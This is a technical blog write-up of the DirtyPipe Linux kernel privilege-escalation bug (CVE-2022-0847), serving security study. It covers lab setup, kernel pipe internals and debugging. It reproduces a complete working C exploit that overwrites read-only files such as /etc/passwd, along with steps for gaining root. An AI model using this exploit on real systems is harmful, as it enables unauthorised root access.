The De Vinci of DirtyPipe Local Privilege Escalation — CVE-2022–0847

23 min readSep 1, 2023

We will dive deep into DirtyPipe vulnerability, see some pipes inside the kernel, understand more about ring buffer, read and write and how all the magic works!🧙‍♂️

Description

Introduction

Before you start, this is me explaining this. so you need to get ready 😅

The public description is as follow

A flaw was found in the way the “flags” member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system.

Background Story

One important note to understand the blog here is that I jumped from point to point back and forth to understand the vulnerability fully

and I believe this is the best way to deliver the mindset behind how the analysis went, but I will establish a flow to make it understandable.

I have this habit of reading as much as I can about a CVE if any resources exist

Easy LPEs are always interesting to me, understanding how one executable can run and give new permissions makes me really curious, also DirtyCow is the ancestor of DirtyPipe

The DirtyPipe room on Tryhackme explained the vulnerability quickly and simple

https://tryhackme.com/room/dirtypipe

I need a little bit more dive-in so I have my own understanding.

My plan for this analysis is as follows:

Build the testing lab
Reproduce the vulnerability
Explain why & how this vulnerability happens
Explain what happens when we open a file, just to understand some terms
Explain how pipe works and dig in the kernel code
Explain the exploit code
Debugging (this is not kernel debugging)
Mitigation

How the vulnerability went in simple terms?

After I finished the blog, I went back to write this. This is how I imagine this whole thing

There is a function that creates a pipe named prepare_pipe
There is another function called main, main will call the prepare_pipe function
The way to create the pipe is as follows:
create the pipe
fill the pipe with data using a loop to write the data to that pipe, the writing happens using a function named pipe_write
If you are filling the pipe in a specific way that will make pipe_write set a flag named PIPE_BUF_FLAG_CAN_MERGE which allows us to overwrite/update the next data that will be written.
Now, since the buffers are ready and the flag is set, we need to empty the buffers to use our own data.
To drain (empty) the pipe. you should read the data and that happens INSIDE the kernel using a function named pipe_read
After that, the splice function will be called, where it will call the do_splice function.
The splice job is to transfer data between the file descriptor and the pipe. It doesn’t exactly transfer as much as it sets a reference which points the pipe to a specific page where it’s already loaded in the memory.
The do_splice which is inside the splice.c will call copy_page_to_iter, and copy_page_to_iter will call copy_page_to_iter_pipe
During this whole process, there’s nothing initializes the flags again, the can_merge is still there and it’s set.
now, in the exploit code the splice copies one byte from the dest file (/etc/passwd) to the pipe, and here is where the next write will come into play, and it modifies the the references page by the splice.

Build the lab

Dirty Pipe has been fixed in Linux kernel versions 5.16.11, 5.15.25, and 5.10.102, and I have been working on another kernel vulnerability so I already had kernel 5.9.8 version running.

There are two methods to change the Linux kernel of a distro that I’m aware of

Using a tool such as Mainline Kernels which we will be using here.
Download the kernel code, compile and set some settings, update the grub, and reboot. I have another blog in the pipeline about this method

For this CVE, I’m using Ubuntu desktop 22.4.2.

You can use mainline as CLI tool or GUI, to download it you can follow the instructions in the repo here:

https://github.com/pimlie/ubuntu-mainline-kernel.sh

To install the GUI version you can follow the instructions below:

sudo add-apt-repository ppa:cappelikan/ppa
sudo apt update
sudo apt install mainline

Once it’s downloaded, search for it here:

Open it, it will take a minute until it updates and it will look like this

You will see something like this, and this is the currently running kernel (in my case I’m running another version, so it says installed)

From the list of the kernel versions, use one that’s vulnerable in my case I’m using 5.9.8

Click on the kernel version and after that install

Once it’s done, it will say installed

Now you can exit, and reboot your machine.

While the system is rebooting, you have to enter the boot menu

If you are using Virtualbox, you have to enter the box while it’s rebooting and when you see the Vbox logo, you have to press SHIFT

Enter “Advanced options for Ubuntu”

Choose the kernel and Enter

Behold, here is the mighty LPE passing by

Download the exploit from here:

git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git

You have to compile the exploit.

If you don’t have the gcc you need to install it

sudo apt install -y gcc

Now make the compile.sh executable and run it

chmod +x compile.sh
./compile.sh

Run ./exploit-1

How this vulnerability happens

Based on what was already published and written about this vulnerability, it’s really simple

In simple terms it goes as follows:

You have a file (e.g. /etc/passwd) that you have permission to read (even if you have read-only)
Once this file is opened, the data will be loaded into the memory pages
We will abuse pipe to overwrite the loaded data in the memory page so we edit a specific user
Now, if you overwritten the password of the root inside the memory, and you want to enter as a root
the system will go to the memory to get the data from there. Why? because it’s useless to go to the file each time, so we have a page cache so the system fetches data from it, but the data is altered as we overwritten it, which means we can use our new password and it will be right. VOILÀ!

NOTE: This vulnerability OVERWRITE the data in the page cache which means it can overwrite anything, like overwrite the password, the user, or even remove the password 😁, but also that means once the page cache is cleaned and the process needs to go fetch from the file (/etc/passwd) you lost your new password or whatever alteration you did before.

I explained different exploits to show different scenarios.

But it’s not that simple

Just to explain a little bit more in detail how the opening of a file works

When a process in the userland (user-space) attempts to open a file, the Linux kernel performs several steps to make the file data accessible to the process.

Here’s a more detailed explanation of the process:

File Descriptor: The process invokes the open() system call to open a file. This system call returns a file descriptor, which is an integer representing the opened file in the process’s file descriptor table.

File Metadata: The kernel retrieves the file’s metadata, such as the file size, permissions, and location, from the file system. This metadata is stored in data structures associated with the opened file.

Memory Pages: The kernel prepares memory pages to hold the file data. A memory page is a fixed-size block of memory managed by the operating system.

Page Cache: If the file data is not already in the kernel’s page cache, the kernel loads the required pages from the file system into the page cache. The page cache is a cache of recently accessed file data that resides in the kernel’s memory.
Memory Mapping: The kernel establishes a mapping between the file data in the page cache and the virtual address space of the userland process. This mapping allows the process to access the file data as if it were part of its own memory.
Copying Data to User-Space: One approach to providing userland access is to copy the file data from the page cache into the user-space memory allocated for the process. The kernel utilizes memory copy operations, such as copy_to_user(), to copy the data.
Direct Userland Access: Another approach is to keep the file data in kernel-space but provide userland access to it through system calls. Special functions, such as read() or mmap(), are used to interact with the kernel and retrieve or manipulate the file data.
read() System Call: The process can read the file data by invoking the read() system call, which copies the requested data from the kernel-space buffer to the user-space buffer provided by the process.
mmap() System Call: The process can also map the file directly into its address space using the
mmap() system call. This establishes a mapping between the file data in the kernel-space page cache and the process's virtual memory, allowing the process to access the file data through regular memory operations.

In our case it’s the second approach, also the choice between copying the file data into user-space or providing direct access through system calls depends on various factors, such as performance considerations, memory usage, and the specific requirements of the application.

What is pipe and How it works?

A lot of us are familiar with | pipe as we use it a lot in *nix and windows systems
But this is what it's called "Anonymous pipe"

anonymous pipe is a simplex FIFO communication channel that may be used for one-way interprocess communication. An implementation is often integrated into the operating system’s file IO subsystem. Wikipedia

I checked the manual (man) of pipe and here is what I found, and it makes a lot of sense especially when we read the code of the exploit.

pipe() creates a pipe, a unidirectional data channel that can be used for interprocess communication.

The array pipefd is used to return two file descriptors referring to the ends of the pipe.

pipefd[0] refers to the read end of the pipe. pipefd[1] refers to the write end of the pipe.

Data written to the write end of the pipe is buffered by the kernel until it is read from the read
end of the pipe. For further details, see pipe(7).

The links for pipe and pipe(7) in the resources, I would recommend going through both

I go more in-depth about how pipe works in Go to pipe.c

Explaining the exploit code

Code Review

Since I need to understand how pipe works here but also I want to understand it from the code review and how to do it a little bit more manually before going to dynamical or interactive debugging so I found another PoC where I need to supply the dest file, the offset, and data.

Btw, the code here it’s basically the same code we used in the vulnerability reproduce section, but thanks to the guy who edited the code and made it more manual.

Let’s dive into the exploit code, a lot of explanation already in the code

it starts with including the headers and defining some variables

#define GNUSOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

Next part here

initialize the pipe and that happens by creating the pipe and filling it
The process of filling the pipe will set the PIPE_BUF_FLAG_CAN_MERGE flag on each pipe_buffer
After that drain it after filling the pipe
Finally, the comment says the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its “flags”, the buffer will be mergeable
What’s interesting for me here is Why fill it and after that drain it?! Kinda doesn’t make sense!

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];
    /* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }
    /* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }
    /* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}

Let me explain the code more in detail first, after that I will go through the kernel code where I understood why

if (pipe(p)) abort(); : This line creates a new pipe with two file descriptors, one for reading
(p[0]) and one for writing (p[1]). If the pipe() call fails, the program aborts immediately.
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);: This line retrieves the size of the pipe
buffer by calling fcntl with the file descriptor p[1] (the writing end of the pipe) and the command F_GETPIPE_SZ. The size is stored in the variable pipe_size.
https://man7.org/linux/man-pages/man2/fcntl.2.html

static char buffer[4096];: A static character array (buffer) of size 4096 bytes (4 KB) is
declared. This buffer will be used to fill and drain the pipe.
Fill the pipe: The code proceeds to fill the pipe completely to initialize the flags for each pipe_buffer instance in the pipe. The pipe is filled using the write system call in chunks of sizeof(buffer) bytes until the entire pipe is filled. This step ensures that each pipe_buffer instance will have the PIPE_BUF_FLAG_CAN_MERGE flag initialized.
Drain the pipe: After filling the pipe, the code then proceeds to drain the pipe using the read system call in chunks of sizeof(buffer) bytes. This step does not affect the PIPE_BUF_FLAG_CAN_MERGE flag; it merely empties the pipe of any data that was previously written.
Flag representation: The flag being set in this code is the PIPE_BUF_FLAG_CAN_MERGE flag. It is used to mark each pipe_buffer instance in the pipe as mergeable, indicating that adjacent buffer instances can be merged into a single larger buffer.

Now going to the next part of the code, and explain it a little bit in detail after that I will come back and explain some stuff (just keep going back and forth) 😁

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
        return EXIT_FAILURE;
    }
    /* dumb command-line argument parser */
    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);
    if (offset % PAGE_SIZE == 0) {
        fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
        return EXIT_FAILURE;
    }
    const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
    const loff_t end_offset = offset + (loff_t)data_size;
    if (end_offset > next_page) {
        fprintf(stderr, "Sorry, cannot write across a page boundary\n");
        return EXIT_FAILURE;
    }
    /* open the input file and validate the specified offset */
    const int fd = open(path, O_RDONLY); // yes, read-only! :-)
    if (fd < 0) {
        perror("open failed");
        return EXIT_FAILURE;
    }
    struct stat st;
    if (fstat(fd, &st)) {
        perror("stat failed");
        return EXIT_FAILURE;
    }
    if (offset > st.st_size) {
        fprintf(stderr, "Offset is not inside the file\n");
        return EXIT_FAILURE;
    }
    if (end_offset > st.st_size) {
        fprintf(stderr, "Sorry, cannot enlarge the file\n");
        return EXIT_FAILURE;
    }
    /* create the pipe with all flags initialized with
       PIPE_BUF_FLAG_CAN_MERGE */
    int p[2];
    prepare_pipe(p);
    /* splice one byte from before the specified offset into the
       pipe; this will add a reference to the page cache, but
       since copy_page_to_iter_pipe() does not initialize the
       "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
    --offset;
    ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
    if (nbytes < 0) {
        perror("splice failed");
        return EXIT_FAILURE;
    }
    if (nbytes == 0) {
        fprintf(stderr, "short splice\n");
        return EXIT_FAILURE;
    }
    /* the following write will not create a new pipe_buffer, but
       will instead write into the page cache, because of the
       PIPE_BUF_FLAG_CAN_MERGE flag */
    nbytes = write(p[1], data, data_size);
    if (nbytes < 0) {
        perror("write failed");
        return EXIT_FAILURE;
    }
    if ((size_t)nbytes < data_size) {
        fprintf(stderr, "short write\n");
        return EXIT_FAILURE;
    }
    printf("It worked!\n");
    return EXIT_SUCCESS;
}

Command-line argument parsing: The program receives the target file name (TARGETFILE), the starting offset where data will be written (OFFSET), and the data to be written (DATA) as command-line arguments.
Checking alignment: The code checks whether the specified OFFSET is aligned with the page size (PAGE_SIZE). If it is, the program prints an error message and exits since writing to a page boundary could lead to unexpected behavior.
Boundary check: The code calculates the next page boundary (next_page) after the OFFSET and checks if the end offset (end_offset) of the data being written extends beyond the next page boundary. If it does, the program prints an error message and exits to prevent writing across a page boundary.
Opening the input file: The program opens the input file in read-only mode using the open system call and retrieves its size using fstat. It performs checks to ensure that the specified OFFSET and end_offset are within the file size.
https://man7.org/linux/man-pages/man3/fstat.3p.html

Creating the pipe: The program creates a pipe with two file descriptors using the prepare_pipe function that we explained before. This pipe will be used to transfer data between the file and the memory.
Splicing a byte: Before writing the actual data, the code performs a splice operation. It reads one byte from the file at the position before the specified OFFSET and writes it into the pipe. This operation adds a reference to the page cache, but because the copy_page_to_iter_pipe() function does not initialize the "flags," the PIPE_BUF_FLAG_CAN_MERGE flag remains set.
https://man7.org/linux/man-pages/man2/splice.2.html

Writing data to the page cache: The program then writes the new data (DATA) into the pipe. Due to the presence of the PIPE_BUF_FLAG_CAN_MERGE flag in the pipe buffer, the write operation writes the data directly into the page cache instead of creating a new pipe buffer. This allows the data to be merged efficiently with the existing page cache data, reducing overhead.
Completion and success message: If everything works as expected, the program prints “It worked!” to indicate that the data has been successfully overwritten in the file.

Let’s see something interesting 😃 — Oh yeah I forgot to tell you this here, won’t replace the password

But here, if I just run the command su rtest I will be root : D

Here, I was a little bit confused not because it changed the user, but because it removed the password.

You can notice it here

But here you need to remember, it’s overwriting not changing something specific.
So it can overwrite whatever want to

Here’s an illustration of how the overwriting happens

This is my mind after I understood this

Let me explain this more in detail, bc from what I experienced while studying this vulnerability is the whole trick about how to initialize the pipe and ab/use 😄 it to overwrite the data in the memory page

Dive inside the kernel

Well, here I was more curious about all of it! How the PIPE_BUF_FLAG_CAN_MERGE is set? why we are filling the pipe first? why drain it again?!!! it doesn’t make much sense

So, I read the whole pipe.c and splice.c and this was a really informative reading 😅

https://elixir.bootlin.com/linux/v5.9.8/C/ident/PIPE_BUF_FLAG_CAN_MERGE

Here we can see the flag is defined and there is a bit flag “0x10”

Bit flags are a programming technique to represent multiple boolean values or multiple states into a single integer.

https://elixir.bootlin.com/linux/v5.9.8/source/include/linux/pipe_fs_i.h#L11

After that, we got the struct of the pipe_buffer, which is really interesting because this is part of the idea behind filling the pipe, the PIPE_BUF_FLAG_CAN_MERGE will be set on the pipe_buffer

Going to pipe.c

https://elixir.bootlin.com/linux/v5.9.8/source/fs/pipe.c

I won’t be able to explain the full code of pipe.c, I mean c’mon there are 1431 lines of code and each function calls a lot of other functions : D

The most important to me here are pipe_write function and pipe_read function.

pipe_write

The pipe_write function handles the process of writing data to a pipe. We will go over an overview of the steps of the pipe_write, and after that, I will go more in-depth with specific steps:

Initialization and Setup:

Extract the pipe_inode_info structure, which contains information about the pipe.
Define some initial variables.

struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);

2. Handling Edge Cases:

If the data to be written (total_len) is zero (i.e., there's nothing to write), it simply returns 0.

if (unlikely(total_len == 0))
 	return 0;

3. Lock the Pipe:

Locks the pipe for synchronized access using __pipe_lock(pipe).

4. Check if Pipe has Readers:

If there are no readers on the other end of the pipe, it sends a SIGPIPE signal to the current process and returns an error (-EPIPE).

if (!pipe->readers) {
   send_sig(SIGPIPE, current, 0);
   ret = -EPIPE;   goto out;
 }

5. Merge Small Writes:

The kernel attempts to optimize small writes by merging them into an existing buffer (last buffer) if space permits.

head = pipe->head;
 was_empty = pipe_empty(head, pipe->tail);
 chars = total_len & (PAGE_SIZE-1);
 if (chars && !was_empty) { ... }

6. Write Loop:

The main writing loop attempts to write data into the pipe’s buffers until either all data is written, or the pipe becomes full.
Each iteration checks the state of the pipe (e.g., if there are any readers), tries to allocate buffer space in the pipe’s ring buffer, and then copies data from the user’s space.
If the pipe becomes full and the writer is in non-blocking mode, it returns -EAGAIN. If a signal is pending, it returns -ERESTARTSYS. Otherwise, it waits for space to become available.

7. Wake Up:

If data was written to an empty pipe, any waiting readers are woken up, so they can start reading the data.

if (was_empty) {
   wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); 
}

8. Unlock and Finalize:

The pipe is unlocked, and any final wake-up events are handled.
__pipe_unlock(pipe);

9. File Time Update:

If data was successfully written, the file’s time metadata is updated.
if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) { ... }

10. Return:

Finally, the function returns. The return value is either the number of bytes written or an error code.
return ret;

Slide inside the pipe_write

Basically, the important parts are the Merge Small writes and the write loop.

head = pipe->head;
    was_empty = pipe_empty(head, pipe->tail);
    chars = total_len & (PAGE_SIZE-1);
    if (chars && !was_empty) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
        int offset = buf->offset + buf->len;
        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            ret = pipe_buf_confirm(pipe, buf);
            if (ret)
                goto out;
            ret = copy_page_from_iter(buf->page, offset, chars, from);
            if (unlikely(ret < chars)) {
                ret = -EFAULT;
                goto out;
            }
            buf->len += ret;
            if (!iov_iter_count(from))
                goto out;
        }
    }

This part aims to use space efficiently, avoid unnecessary buffer allocations, and not create new buffers.

Let’s delve into it piece by piece:

head = pipe->head;

This line gets the current head of the pipe (i.e., the position where new data will be written next).

2. was_empty = pipe_empty(head, pipe->tail);

This function checks if the pipe is currently empty by comparing the head and tail. It sets was_empty to true if the pipe is empty and false otherwise.

3.chars = total_len & (PAGE_SIZE-1);

This line calculates the remainder of total_len when divided by PAGE_SIZE using bitwise AND operation. Essentially, it's determining how many bytes of the data to be written would exceed full page boundaries.
For instance, if total_len is 4100 and PAGE_SIZE is 4096, chars will be

4. if (chars && !was_empty) { ... }

This block is only executed if there are remaining characters (bytes) that don’t fill a full page (chars is non-zero) and the pipe was not empty.

5.unsigned int mask = pipe->ring_size - 1;

This computes a mask for the ring buffer’s size. It’s used to wrap around the buffer index properly.

6.struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];

This gets the last buffer written to (the current tail buffer) in the pipe.

7.int offset = buf->offset + buf->len;

This computes where in the buffer the new data should be written. The offset is based on where the current data in the buffer ends.

8. Where setting the flag happens: if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && offset + chars <= PAGE_SIZE) { ... }
This block will be executed if:

The last buffer can have more data merged into it (PIPE_BUF_FLAG_CAN_MERGE).
Adding the new data to the current buffer won’t exceed the buffer’s size (PAGE_SIZE).

9. The rest of the code

ret = pipe_buf_confirm(pipe, buf);
This seems to confirm the buffer state. The exact behavior would depend on the implementation of pipe_buf_confirm, but it's likely a check or preparation for writing.
if (ret) goto out;
If pipe_buf_confirm returns a non-zero value, it jumps to the out label, typically indicating an error or a special condition.
ret = copy_page_from_iter(buf->page, offset, chars, from);
This line attempts to copy data from the iterator from into the buffer at the previously computed offset.
if (unlikely(ret < chars)) { ... }
This checks if the number of bytes copied is less than what was intended. If this happens, an error (EFAULT) is set and the function will eventually return.
buf->len += ret;
This updates the buffer's length to reflect the newly written data.
if (!iov_iter_count(from)) goto out;
If there's no more data left to write (as indicated by the iterator from being empty), the function will eventually return.

The next part is not the full for loop, only a part of it.
Because part of the for loop is about pip_unlock and checking if the pipe is full or not, which is not important to us.

for (;;) {
        if (!pipe->readers) {
            send_sig(SIGPIPE, current, 0);
            if (!ret)
                ret = -EPIPE;
            break;
        }
head = pipe->head;
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
            unsigned int mask = pipe->ring_size - 1;
            struct pipe_buffer *buf = &pipe->bufs[head & mask];
            struct page *page = pipe->tmp_page;
            int copied;
            if (!page) {
                page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
                if (unlikely(!page)) {
                    ret = ret ? : -ENOMEM;
                    break;
                }
                pipe->tmp_page = page;
            }
            /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
            spin_lock_irq(&pipe->rd_wait.lock);
            head = pipe->head;
            if (pipe_full(head, pipe->tail, pipe->max_usage)) {
                spin_unlock_irq(&pipe->rd_wait.lock);
                continue;
            }
            pipe->head = head + 1;
            spin_unlock_irq(&pipe->rd_wait.lock);
            /* Insert it into the buffer array */
            buf = &pipe->bufs[head & mask];
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
            if (is_packetized(filp))
                buf->flags = PIPE_BUF_FLAG_PACKET;
            else
                buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            pipe->tmp_page = NULL;
            copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
            if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
                if (!ret)
                    ret = -EFAULT;
                break;
            }
            ret += copied;
            buf->offset = 0;
            buf->len = copied;
            if (!iov_iter_count(from))
                break;
        }

Debugging

I won’t go in-depth with the debugging, I believe the explanation above is much enough.

But I will show you how I did some debugging, and I will attach the debugging log files.

NOTE: You can use whatever debugger you want, tool, plugin to gdb …etc. I’m just too lazy to install anything :-)

PipeTest Debug

In this, I just wanted to see how the prepare_pipe

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();
    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];
    /* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }
    /* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }
    /* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}
int main(int argc, char **argv)
{
    
    /*if (argc != 4) {
            fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
            return EXIT_FAILURE;
    }*/
    /* dumb command-line argument parser */
    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);
    int p[2];
    prepare_pipe(p);
}

Compile
gcc -g pipetest.c
Start gdb
gdb a.out
set disassembly-flavor intel

rbreak pipetest.c:.

lay asm and lay n

Some config

set pagination off
set print pretty
set logging file ./pipetest.log
set logging enabled on
Copying output to ./pipetest.log.
Copying debug output to ./pipetest.log.

Run r /etc/passwd 1 test:

From this point, you can have fun.

Github Link: Uploading …

Full exploit code Debug

The configuration and the setup for this part are exactly the same

The results will be different, the debugging log file.

set pagination off
set print pretty
set logging file ./cve-2022-0847.log
set logging enabled on
Copying output to ./cve-2022-0847.log.
Copying debug output to ./cve-2022-0847.log.

Github Link: Uploading …

The files will be uploaded to github soon, follow the updates on vsociety discord: https://discord.gg/sHJtMteYHQ

Final Thoughts

This is not perfect, but I know I tried a lot to make it as much perfect as I can.

This was a very pleasing journey. However, I think at some point I started to get to points in the kernel that are not exactly related to the vulnerability. That happened because of trying to dive as much as I can into the details so I can have a solid understanding.

Next time I would love to use hooks and dive in the debugging, not only very much code review, also I will add some fuzzing 😃.